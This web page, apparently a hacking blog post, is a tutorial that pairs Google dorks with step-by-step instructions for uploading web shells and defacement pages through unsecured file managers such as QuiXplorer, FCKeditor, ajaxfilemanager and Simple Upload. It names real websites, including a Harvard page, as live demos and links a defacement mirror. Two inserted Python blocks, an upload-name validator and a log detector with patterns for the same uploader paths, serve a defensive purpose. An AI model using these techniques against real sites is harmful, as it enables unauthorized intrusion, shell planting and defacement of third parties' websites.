EzFilemanager Deface Upload vulnerability
Google Dork inurl:ezfilemanager/ezfilemanager.php
(Modify this dork to get more results from Google =)
Asset Manager :Shell and Files upload Vulnerability
Google Dork : “inurl:Editor/assetmanager/assetmanager.asp”
Open Google.com/ncr and enter this dork
“inurl:Editor/assetmanager/assetmanager.asp”
Now Open any site from search results
You will now get a page like this:
Upload File:
and the site URL will be like site.com/Editor/assetmanager/assetmanager.asp
Change "Flash" to "All Files", then choose your file and upload it.
Access your file here: site.com/Editor/assets/yourfilehere
Special : How To upload a cool deface 😉
Open Google Search Engine, Type this dork : inurl:/plugins/ajaxfilemanager/
For Example I got :
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/session/
or http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/jscripts/edit_area/reg_syntax/
for example :
http://www.ziaislamic.com/BOOK-CMS/interfaces/fckeditor/editor/plugins/ajaxfilemanager/ajaxfilemanager.php
http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
Now find the Upload option and upload your shell/deface/file
To view your file, find the /Uploaded/ directory on the website by using your brain 😛
example of uploaded file : http://lovegracia.com/tiny_mce/jscripts/tiny_mce/plugins/ajaxfilemanager/uploaded/aaaaaaaa.txt
http://www.ziaislamic.com/BOOK-CMS/interfaces/uploaded/aaaaaaaa.txt
Title : “Simple Upload 53” : Shell Upload Vulnerability
Google Dork : “inurl:simple-upload-53.php”
Go to Google.com and enter dork ~
“inurl:simple-upload-53.php”
see search results and select any website
the exploit URL will be like this
http://www.site.com/simple-upload-53.php
Now upload your shell here as .php.jpg, .php.gif, etc.
and you can upload your deface as an image type
to view your uploaded file just go to http://www.site.com/files/yourfilehere
Demo site : http://www.stpatricksdayshirts.com/simple-upload-53.php
Uploaded file : http://www.stpatricksdayshirts.com/files/devilscafe.jpg
Funny thing : http://www.stpatricksdayshirts.com/simple-upload-53.php?message= Put your message here and it will show on the website 😀
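From the defender's side, the `.php.jpg` trick above works against upload handlers that check only the last extension. The following is an added example, not code from Simple Upload or from the original post; the allowlist, the script-extension list and the function names are assumptions chosen for illustration.

```python
import os
import re
import secrets

ALLOWED_FINAL = {"jpg", "jpeg", "png", "gif", "txt"}  # assumed allowlist
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "asp", "aspx",
               "asa", "cer", "jsp", "cgi", "pl", "py", "sh", "htm", "html", "shtml"}
SAFE_CHARS = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._ -]*$")


def naive_is_allowed(filename):
    """Weak check: looks only at the last extension, so shell.php.jpg passes."""
    return filename.rsplit(".", 1)[-1].lower() in ALLOWED_FINAL


def safe_stored_name(filename):
    """Return a server-chosen storage name, or None when the upload is rejected."""
    base = os.path.basename(filename.replace("\\", "/"))
    # Rejects empty names, dotfiles (.htaccess) and odd characters such as ';'.
    if not SAFE_CHARS.match(base):
        return None
    parts = [p.lower() for p in base.split(".")]
    if len(parts) < 2 or parts[-1] not in ALLOWED_FINAL:
        return None
    # A web server that maps handlers per extension segment may still execute
    # name.php.jpg, so every dotted segment is checked, not just the last one.
    if any(p in SCRIPT_EXTS for p in parts[1:]):
        return None
    # Never keep the client-supplied name: store under a random one.
    return secrets.token_hex(16) + "." + parts[-1]


if __name__ == "__main__":
    for name in ["photo.JPG", "shell.php.jpg", "shell.asp.jpg", "deface.html"]:
        print(name, naive_is_allowed(name), safe_stored_name(name))
```

Pair this with an upload directory where script execution is disabled in the web server configuration, so a file that slips through is served as static content only.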
“QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability”
open Google.com and type this dork
intitle:”QuiXplorer 2.3 – the QuiX project”
you’ll see a lot of sites; some big websites are vulnerable too, like the Harvard University website,
select any website from search results
Vulnerability
http://[localhost]/[path]/index.php?action=list&order=name&srt=yes
http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
After going to this URL you will see a file manager; you can upload your files here
You can upload directly too by changing the URL, just put action=upload&order=name&srt=yes
http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes
Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or any supported file type
Click on your file to view it
Live demo :
http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=list&order=name&srt=yes
http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=upload&order=name&srt=yes
http://www.hcs.harvard.edu/~eac/letters/filestorage/
I know some asshole will change the deface, so here is a mirror of the defacement: http://attack-h.org/attack/?id=8452
The Portail Dokeos vulnerability is a kind of FCK editor remote file upload vulnerability.
With this vulnerability a hacker can upload a shell, deface page or any file to the website without the admin username and password
Google Dork : “Portail Dokeos 1.8.5”
Exploit : http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Go to : http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html, change asp to PHP as with FCK editor, and upload your deface, shell or file. You can upload .html, .php, .jpg and .txt formats here
To view your uploaded file go here : http://website/patch/main/upload/your file here
“File thingie” ~ Deface & Shell Upload vulnerability
Google Dork : inurl:ft2.php intext:upload
Go to the site and upload your deface or shell. To view your file, click on the file in the list after uploading
Comment If you Have Problem !
Title : “Encodable” ~ another File upload Vulnerability
“Add Testimonial” ~ remote File upload vulnerability.
Google Dork : 2011 all rights reserved.Website Designed by GanjaDaddy.com
[#1] Open website ..
[#2] Go to this URL : testimonial/add.html.php For example : http://Site.com/testimonial/add.html.php
[#3] Now Upload Your Deface or any file
[#4] To view your uploaded file go to /images/testimonial/ , you’ll see an index of files here … click on the last file, it's yours !!
[#5] Enjoy =) Leave a comment below if you like it
“CMS admin Image Uploader” Shell Upload Vulnerability
Google dorks
inurl:”default_image.asp”
inurl:”default_imagen.asp”
You’ll get an upload option after clicking on a link from the Google search results
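For site owners, the uploader scripts and upload directories named on this page are things to look for in web access logs. The following detection sketch is an added example, not part of the original post; it assumes combined-format access logs, the sample lines are constructed, and the rule names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Uploader endpoints and upload directories taken from the URLs on this page.
UPLOADER_PATHS = re.compile(
    r"(ezfilemanager\.php|assetmanager\.asp|ajaxfilemanager\.php"
    r"|simple-upload-53\.php|ft2\.php|filemanager/upload/test\.html"
    r"|testimonial/add\.html\.php|default_imagen?\.asp)$", re.I)
UPLOAD_DIRS = re.compile(
    r"/(editor/assets|uploaded|files|images/testimonial|main/upload)/", re.I)
SCRIPT_SEGMENT = re.compile(r"\.(php\d?|phtml|asp|aspx|jsp|cgi)(\.|$)", re.I)
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')


def classify(line):
    """Return (client_ip, rule, path) for a suspicious request, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, method, target, status = m.groups()
    url = urlsplit(target)
    if method == "POST" and UPLOADER_PATHS.search(url.path):
        return (ip, "post-to-uploader", url.path)
    # Assumption: the file manager upload is a POST with action=upload in the query.
    if method == "POST" and parse_qs(url.query).get("action") == ["upload"]:
        return (ip, "filemanager-upload-action", url.path)
    name = url.path.rsplit("/", 1)[-1]
    if status == "200" and UPLOAD_DIRS.search(url.path) and SCRIPT_SEGMENT.search(name):
        return (ip, "script-served-from-upload-dir", url.path)
    return None


def scan(lines):
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "POST /simple-upload-53.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /files/holiday.php.jpg HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /files/logo.jpg HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Oct/2023:13:57:12 +0000] "POST /docs/index.php?action=upload&order=name&srt=yes HTTP/1.1" 200 700 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Any of these uploader scripts that is reachable without authentication should be removed or placed behind a login rather than only monitored.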